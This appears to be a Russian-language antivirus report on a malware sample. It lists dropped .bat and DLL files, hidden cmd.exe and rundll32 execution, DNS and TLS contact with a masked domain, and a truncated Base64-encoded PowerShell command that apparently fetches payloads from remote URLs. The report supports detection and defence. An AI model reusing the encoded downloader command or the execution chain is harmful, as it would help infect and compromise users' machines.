Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\uwdhx.bat
- %ALLUSERSPROFILE%\1347250943.dll
Перемещает следующие файлы
- %ALLUSERSPROFILE%\1347250943.dll в %LOCALAPPDATA%\hwukietegwxs\pmyhmxgilsw.wfe
Сетевая активность
TCP
Другие
- 'th####ndskill.com':443
UDP
- DNS ASK th####ndskill.com
Другое
Ищет следующие окна
- ClassName: 'OleMainThreadWndClass' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc JABzAHQAcgBzAD0AIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAdAByAGUAbgBkAHMAawBpAGwAbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUASAAxADEALwAsAGgAdAB0AHAAOgAvAC8AYQBsAGkAdAB0AGwAZQBiAHIAYQB2AGUALgBj...
- '%WINDIR%\syswow64\rundll32.exe' %ALLUSERSPROFILE%\1347250943.dll,f2053649999
- '%WINDIR%\syswow64\rundll32.exe' "%ALLUSERSPROFILE%\1347250943.dll",DllRegisterServer
- '%WINDIR%\syswow64\rundll32.exe' "%LOCALAPPDATA%\Hwukietegwxs\pmyhmxgilsw.wfe",xvvBuNbBQbPSOV
- '%WINDIR%\syswow64\rundll32.exe' "%LOCALAPPDATA%\Hwukietegwxs\pmyhmxgilsw.wfe",DllRegisterServer
